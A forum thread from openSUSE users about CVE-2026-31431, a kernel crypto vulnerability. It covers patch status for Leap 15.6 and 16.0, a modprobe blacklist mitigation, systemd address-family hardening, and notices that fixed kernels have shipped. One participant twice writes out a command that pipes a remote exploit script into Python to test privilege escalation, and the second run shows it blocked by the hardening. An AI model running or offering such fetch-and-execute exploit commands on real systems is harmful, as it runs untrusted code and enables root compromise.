Is there a patch for CVE-2026-31431 for openSUSE?

keyb_user1 · May 1, 2026, 8:21am

hi,
I have installed all latest updates and I can not find a reference to a patch on CVE-2026-31431.
Is it just my mistake or there is no patch yet for this bug on our OpenSuSE kernels? Or maybe even it may not be an issue for OpenSuSE?

rawar · May 1, 2026, 8:37am

Fyi https://bugzilla.suse.com/show_bug.cgi?id=1262573
It is an issue for Leap 15.x/16.0 but not for current Tumbleweed kernels (6.19.12, 7.x.y). But there is a easy mitigation for the problem https://copy.fail/#mitigation

knurpht · May 1, 2026, 9:29am

Not a patch, but a temporary fix is there:

from the SUSE website:

Create a file /etc/modprobe.d/10-temp-cve-fix.conf with following content

blacklist algif_aead
install algif_aead /bin/false

Do sudo modprobe -r algif_aead
Reboot

user42 · May 1, 2026, 9:36am

So there will be a patch for 16.0 (and for 15.6) in future?

knurpht · May 1, 2026, 9:38am

SUSE is working on it as we speak. And given the severity I expect it to be pushed out as soon as it’s ready.

hcvv · May 1, 2026, 11:01am

I doubt. Same as for 15.5, 15.4, …

user42 · May 1, 2026, 11:30am

Oh, I was afraid of that.

So the users who decided to wait for 16.1 are forced to weigh two risks:
installing the unpolished 16.0 or remaining on 15.6 with a critical security gap.

Do the mitigations mentioned above hold for 15.6 too?
Do they have any practical drawbacks?

malcolmlewis · May 1, 2026, 12:02pm

@user42 AFAIK there will be an update pushed for Leap 15.6.

hcvv · May 1, 2026, 12:10pm

I have no idea why users would want that (skipping a version), but basically you are correct. Using unsupported software of any kind (not restricted to the operating system) can result in security problems that will not be fixed. In fact that is what “unsupported” or “end of life” means to say.

rawar · May 1, 2026, 12:48pm

The mitigation will work for 15.6 too. For normal users, especially desktop users, it is very unlikely that the mitigation will have any negative impact or have impact at all.

GrandDixence2 · May 1, 2026, 9:11pm

# more /etc/sysconfig/security |grep -v ^# |sort |uniq

CHECK_POLKIT_PRIVS="set"
PERMISSION_FSCAPS="no"
PERMISSION_SECURITY="paranoid local"
POLKIT_DEFAULT_PRIVS=""

# more /etc/permissions.d/permissions.local |grep -v ^# |sort |uniq

/usr/bin/clockdiff				root:root	0755
/usr/bin/dumpcap				root:wireshark	0750
/usr/bin/fusermount3				root:trusted	0750
/usr/lib/gstreamer-1.0/gst-ptp-helper		root:root	0755
/usr/lib/utempter/utempter			root:utmp	0755

# ls -alh /etc/permissions.d/permissions.local
-rw-r--r-- 1 root root 1.7K ... /etc/permissions.d/permissions.local

# permctl --system --warn
# permctl --system --set

# find / -perm /6000 -type f > /tmp/test.txt
# more /tmp/test.txt

# getcap -r /

# curl https://copy.fail/exp | python3.13 && su
# id                 
uid=1000(foo) gid=100(users) groups=100(users)

https://doc.opensuse.org/documentation/leap/security/html/book-security/sec-sec-file-management.html#sec-sec-prot-general-file-permissions

https://copy.fail/#exploit

hendersj · May 1, 2026, 10:34pm

Arguably, given that yesterday was the EOL day for 15.6, if you opt to stick with that, you’re going to end up with security gaps (potentially critical) before 16.1 releases.

user42 · May 2, 2026, 7:55am

… and you are absolutely right with that…

That’s why I suggested to prolong EOL 15.6 until they succeeded in providing a more reliable version of 16 series. Hopefully this will be 16.1. And hopefully there won’t be any more situations like this where users are pressed to by OpenSUSE.
But let’s stop this… as OT.

GrandDixence2 · May 2, 2026, 9:13pm

For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.

https://copy.fail/#exploit

man systemd.exec

# more /etc/systemd/system/user@1000.service.d/99-user-foo.conf |grep -i addressfamilies
RestrictAddressFamilies=AF_UNIX AF_NETLINK AF_INET AF_INET6

# ls -alh /etc/systemd/system/user@1000.service.d/99-user-foo.conf
-rw-r--r-- 1 root root 2.5K  ... /etc/systemd/system/user@1000.service.d/99-user-foo.conf

# curl https://copy.fail/exp | python3.13 && su
...
Traceback (most recent call last):
  File "<stdin>", line 9, in <module>
  File "<stdin>", line 5, in c
  File "/usr/lib64/python3.13/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
    ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 97] Address family not supported by protocol

https://forums.opensuse.org/t/measures-to-harden-an-opensuse-install-and-to-run-an-opensuse-system-securely/180953/23

rawar · May 3, 2026, 9:12am

Just FYI fixed 16.0 kernel is available

rpm --changelog -q kernel-default-6.12.0-160000.29.1.x86_64| head -10
* Fr Mai 01 2026 nstange@suse.de
- crypto: authencesn - Fix src offset when decrypting in-place
  (bsc#1262573 CVE-2026-31431).
- commit 66d7b47

* Fr Mai 01 2026 nstange@suse.de
- crypto: authencesn - Do not place hiseq at end of dst for
  out-of-place decryption (bsc#1262573 CVE-2026-31431).
- commit d5fe1c6
...

ks25 · May 5, 2026, 1:07am

run zypper refresh
confirm update to kernel 6.4.0-150600.23.100-default

keyb_user1 · May 5, 2026, 2:23pm

Blockquote confirm update to kernel 6.4.0-150600.23.100-default

you mean 6.12.0-160000.29.1

hcvv · May 5, 2026, 2:42pm

After this mornings update:

henk@boven:~> uname -r
6.12.0-160000.29-default
henk@boven:~>

malcolmlewis · May 5, 2026, 2:48pm

The poster is referring to Leap 15.6…

rawar · May 5, 2026, 2:49pm

For Leap 15.6 altough EOL https://bugzilla.suse.com/show_bug.cgi?id=1262573#c65